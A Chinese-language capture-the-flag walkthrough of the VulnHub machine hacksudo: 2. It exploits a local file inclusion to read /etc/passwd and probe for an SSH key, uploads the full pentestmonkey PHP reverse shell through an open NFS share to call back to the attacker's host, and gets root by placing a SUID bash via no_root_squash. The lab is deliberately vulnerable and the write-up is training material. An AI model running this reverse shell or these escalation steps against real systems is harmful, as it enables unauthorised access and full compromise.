靶机渗透练习94-hacksudo：2 (HackDudo)

靶机描述

靶机地址：https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/

Description

N/A

This works better with VirtualBox rather than VMware

一、搭建靶机环境

攻击机Kali：

IP地址：192.168.9.3

靶机：

IP地址：192.168.9.13

注：靶机与Kali的IP地址只需要在同一局域网即可（同一个网段,即两虚拟机处于同一网络模式）

该靶机环境搭建如下

1. 将下载好的靶机环境，导入 VritualBox，设置为 Host-Only 模式
2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l （指定网卡扫）

arp-scan -I eth0 -l

⬢  hacksudo: 2 (HackDudo)  arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.3
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.1     0a:00:27:00:00:12       (Unknown: locally administered)
192.168.9.1     08:00:27:87:4e:43       PCS Systemtechnik GmbH (DUP: 2)
192.168.9.13    08:00:27:d5:81:09       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.070 seconds (123.67 hosts/sec). 3 responded

方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.184.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.184.0/24

方法四、fping -aqg 指定网段

fping -aqg 192.168.9.0/24

方法五、待补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

⬢  hacksudo: 2 (HackDudo)  nmap -A -sV -T4 -p-  192.168.9.13                
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 15:58 CST
Nmap scan report for bogon (192.168.9.13)
Host is up (0.00052s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.46 ((Ubuntu))
|_http-title: hacksudo:2
|_http-server-header: Apache/2.4.46 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      40779/udp   mountd
|   100005  1,2,3      41143/tcp   mountd
|   100005  1,2,3      45699/tcp6  mountd
|   100005  1,2,3      51674/udp6  mountd
|   100021  1,3,4      40286/udp   nlockmgr
|   100021  1,3,4      41791/tcp   nlockmgr
|   100021  1,3,4      43313/tcp6  nlockmgr
|   100021  1,3,4      49225/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
1337/tcp  open  ssh      OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 52:2e:98:98:b9:e9:c0:92:ed:ac:f8:8c:ee:3c:2e:dc (RSA)
|   256 6b:bb:8c:90:71:6a:f9:e8:2a:12:8f:0a:78:2b:26:7d (ECDSA)
|_  256 13:68:45:ff:32:68:0c:e4:b5:1e:9b:ae:b6:33:f3:be (ED25519)
2049/tcp  open  nfs_acl  3 (RPC #100227)
41143/tcp open  mountd   1-3 (RPC #100005)
41791/tcp open  nlockmgr 1-4 (RPC #100021)
42967/tcp open  mountd   1-3 (RPC #100005)
44777/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:D5:81:09 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms bogon (192.168.9.13)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.15 seconds
⬢  hacksudo: 2 (HackDudo)  

开放了80,111,1337,2049,41143,41791,42967,44777端口

1337对应ssh服务，同时发现2049开着 NFS 服务

2.2枚举漏洞

2.2.1 80 端口分析

访问：http://192.168.9.13/

查看其源码也没有什么发现

咱们扫一下目录看看：gobuster dir -u http://192.168.9.13 -x txt,php,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o hacksudo2.txt

⬢  hacksudo: 2 (HackDudo)  gobuster dir -u http://192.168.9.13 -x txt,php,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o hacksudo2.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.13
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
2022/05/06 16:05:54 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1587]
/web                  (Status: 301) [Size: 310] [--> http://192.168.9.13/web/]
/info.php             (Status: 200) [Size: 79822]                             
/audio                (Status: 301) [Size: 312] [--> http://192.168.9.13/audio/]
/css                  (Status: 301) [Size: 310] [--> http://192.168.9.13/css/]  
/test.html            (Status: 200) [Size: 3064]                                
/game.html            (Status: 200) [Size: 32472]                               
/lib                  (Status: 301) [Size: 310] [--> http://192.168.9.13/lib/]  
/file.php             (Status: 200) [Size: 238]                                 
/tiles                (Status: 301) [Size: 312] [--> http://192.168.9.13/tiles/]
/server-status        (Status: 403) [Size: 277]                                 
                                                                                
===============================================================
2022/05/06 16:10:02 Finished
===============================================================

访问：http://192.168.9.13/web/

这里边没有发现有价值的东西

访问：http://192.168.9.13/info.php

得到网站路径为/var/www/html

访问：http://192.168.9.13/file.php

查看源码除了https://hacksudo.com无其他发现

提示了可以进行文件访问，感觉像是存在LFI

拿wfuzz工具模糊测试一下

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 0 -u http://192.168.9.13/file.php\?FUZZ\=/etc/passwd

结果有点迷，全是200

换ffuf 工具在搞一下

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.9.13/file.php?FUZZ=/etc/passwd -fs 238

⬢  hacksudo: 2 (HackDudo)  ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.9.13/file.php\?FUZZ\=/etc/passwd -fs 238

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.9.13/file.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 238
________________________________________________

file                    [Status: 200, Size: 2170, Words: 23, Lines: 44, Duration: 8ms]
:: Progress: [4711/4711] :: Job [1/1] :: 2249 req/sec :: Duration: [0:00:02] :: Errors: 0 ::
⬢  hacksudo: 2 (HackDudo)  

成功测试出参数file，说明参数file允许本地文件包含

查看一下：view-source:http://192.168.9.13/file.php?file=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo:/home/hacksudo:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
_rpc:x:113:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:114:65534::/var/lib/nfs:/usr/sbin/nologin

发现存在hacksudo用户，查看一下id_rsa

view-source:http://192.168.9.13/file.php?file=/home/hacksudo/.ssh/id_rsa

无回显

这里可以利用LFI进行反弹shell，不过这个靶机咱们利用下面这新服务进行一系列操作

2.2.2 2049端口分析

这个端口的利用方式可以参考：https://book.hacktricks.xyz/pentesting/nfs-service-pentesting

NFS它是一个客户端/服务器系统，允许用户通过网络访问文件并将它们视为驻留在本地文件目录中

要知道哪个文件夹有服务器可用于挂载，使用以下命令查询一下：

⬢  hacksudo: 2 (HackDudo)  showmount -e 192.168.9.13
Export list for 192.168.9.13:
/mnt/nfs *

正如您在上面看到的，NFS 安装在远程机器的 /mnt/nfs 上，任何人都可以访问

所以，我将它挂载到我的本地机器上，这里得注意是本地机器的 root用户

⬢  /mnt  mkdir nfs
⬢  /mnt  mount -t nfs 192.168.9.13:/mnt/nfs ./nfs
⬢  /mnt  ls -al
总用量 56
drwxr-xr-x  5 root root  4096  5月  6 17:24 .
drwxr-xr-x 21 root root 36864  4月 13 16:18 ..
drwxr-xr-x  2 root root  4096 12月  3 17:03 cdrom
drwxr-xr-x  2 root root  4096  3月 24 10:22 mercy
drwxr-xr-x  2 root root  4096  3月 16  2021 nfs
⬢  /mnt  cd nfs                    
⬢  nfs  ls -al
总用量 12
drwxr-xr-x 2 root root 4096  3月 16  2021 .
drwxr-xr-x 5 root root 4096  5月  6 17:24 ..
-rw-r--r-- 1 root root   25  3月 16  2021 flag1.txt
⬢  nfs  cat flag1.txt     
now root this system !!!
⬢  nfs  

发现flag1

2.3漏洞利用

2.3.1 LFI漏洞利用

成功测试出参数file，说明参数file允许本地文件包含

查看一下：view-source:http://192.168.9.13/file.php?file=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo:/home/hacksudo:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
_rpc:x:113:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:114:65534::/var/lib/nfs:/usr/sbin/nologin

发现存在hacksudo用户，查看一下id_rsa

view-source:http://192.168.9.13/file.php?file=/home/hacksudo/.ssh/id_rsa

无回显

2.3.2 NFS服务利用

在挂载目录中复制了kali自带的php-reverse-shell.php,并使用浏览器执行它。

⬢  nfs  cp /home/kali/常用/php-reverse-shell.php /mnt/nfs 
⬢  nfs  ls-al 
zsh: command not found: ls-al
⬢  nfs  ls -al
总用量 16
drwxr-xr-x 2 root root 4096  5月  6 17:28 .
drwxr-xr-x 5 root root 4096  5月  6 17:24 ..
-rw-r--r-- 1 root root   25  3月 16  2021 flag1.txt
-rw------- 1 root root 2705  5月  6 17:28 php-reverse-shell.php
⬢  nfs  vim php-reverse-shell.php 
⬢  nfs  cat php-reverse-shell.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.9.3';
$port = 6666;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
        if (!$daemon) {
                print "$string\n";
        }
}

?>
⬢  nfs  ls -al
总用量 16
drwxr-xr-x 2 root root 4096  5月  6 17:31 .
drwxr-xr-x 5 root root 4096  5月  6 17:24 ..
-rw-r--r-- 1 root root   25  3月 16  2021 flag1.txt
-rw------- 1 root root 2701  5月  6 17:31 php-reverse-shell.php
⬢  nfs  mv php-reverse-shell.php shell.php      
⬢  nfs  chmod 777 shell.php 
⬢  nfs  ls -al 
总用量 16
drwxr-xr-x 2 root root 4096  5月  6 17:38 .
drwxr-xr-x 5 root root 4096  5月  6 17:24 ..
-rw-r--r-- 1 root root   25  3月 16  2021 flag1.txt
-rwxrwxrwx 1 root root 2701  5月  6 17:31 shell.php
⬢  nfs  

刚开始弹不出shell，不知道咋回事，后来查看权限，发现权限太低了

成功弹出shell

⬢  hacksudo: 2 (HackDudo)  nc -lvp 6666            
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.9.3] from bogon [192.168.9.13] 54110
Linux hacksudo 5.8.0-41-generic #46-Ubuntu SMP Mon Jan 18 16:48:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 09:40:51 up  1:44,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ 

2.4权限提升

2.4.1 信息收集

$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@hacksudo:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@hacksudo:/$ 

发现权限很低，咱们是通过NFS进来的，去查看一下NFS的配置文件

www-data@hacksudo:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/mnt/nfs       *(rw,no_root_squash)
www-data@hacksudo:/$ 

可以看到，配置中 no_root_squash

因此，我们可以利用它来获取root权限

具体操作步骤参考：https://book.hacktricks.xyz/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe

在客户端机器上挂载该目录，并以根用户身份在挂载的文件夹中复制/bin/bash二进制文件并为其赋予 SUID 权限，并从受害机器上执行该bash二进制文件。

kali中 运行

⬢  nfs  cp /bin/bash .
⬢  nfs  chmod +s bash

反向shell中运行

www-data@hacksudo:/$ cd /mnt/nfs
cd /mnt/nfs
www-data@hacksudo:/mnt/nfs$ ls -al
ls -al
total 1220
drwxr-xr-x 2 root root    4096 May  6 10:19 .
drwxr-xr-x 4 root root    4096 Mar 16  2021 ..
-rwsr-sr-x 1 root root 1230360 May  6 10:19 bash
-rw-r--r-- 1 root root      25 Mar 16  2021 flag1.txt
-rwxrwxrwx 1 root root    2701 May  6 09:31 shell.php
www-data@hacksudo:/mnt/nfs$ ./bash -p
./bash -p
./bash: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./bash)
www-data@hacksudo:/mnt/nfs$ 

应该是我kali机器的bash版本过高

⬢  nfs  bash -version     
GNU bash，版本 5.1.16(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2020 Free Software Foundation, Inc.
许可证 GPLv3+: GNU GPL 许可证第三版或者更新版本 <http://gnu.org/licenses/gpl.html>

本软件是自由软件，您可以自由地更改和重新发布。
在法律许可的情况下特此明示，本软件不提供任何担保。

www-data@hacksudo:/mnt/nfs$ bash -version
bash -version
bash -version
GNU bash, version 5.0.17(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2019 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
www-data@hacksudo:/mnt/nfs$ 

经过一番折腾(大致确定是bash的问题，换了个bash就好了)，成功拿到root权限，并在root目录下拿到最终flag

$ cd /mnt
$ ls
hackshala
nfs
$ cd nfs
$ ls
bash
flag1.txt
shell.php
$ ./bash -p
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
bash
flag1.txt
shell.php
./bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cd /root
ls -al
total 36
drwx------  5 root root 4096 Mar 16  2021 .
drwxr-xr-x 20 root root 4096 Jan 27  2021 ..
-rw-------  1 root root  632 Jan 30  2021 .bash_history
-rw-r--r--  1 root root 3106 Aug 14  2019 .bashrc
drwxr-xr-x  3 root root 4096 Jan 27  2021 .local
-rw-r--r--  1 root root  161 Sep 16  2020 .profile
drwx------  2 root root 4096 Jan 30  2021 .ssh
-r--------  1 root root  315 Mar 16  2021 root.txt
drwxr-xr-x  3 root root 4096 Jan 27  2021 snap
cat root.txt
rooted!!!
| |__   __ _  ___| | _____ _   _  __| | ___         ___ ___  _ __ ___  
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \       / __/ _ \| '_ ` _ \ 
| | | | (_| | (__|   <\__ \ |_| | (_| | (_) |  _  | (_| (_) | | | | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/  (_)  \___\___/|_| |_| |_|
www.hacksudo.com

总结

本靶机主要通过NFS服务进行反弹shell，以及提权

1. 信息收集
2. gobuster 目录扫描
3. wfuzz、ffuf模糊测试
4. NFS服务上传shell进行反弹shell
5. 利用NFS配置不当进行传bash提权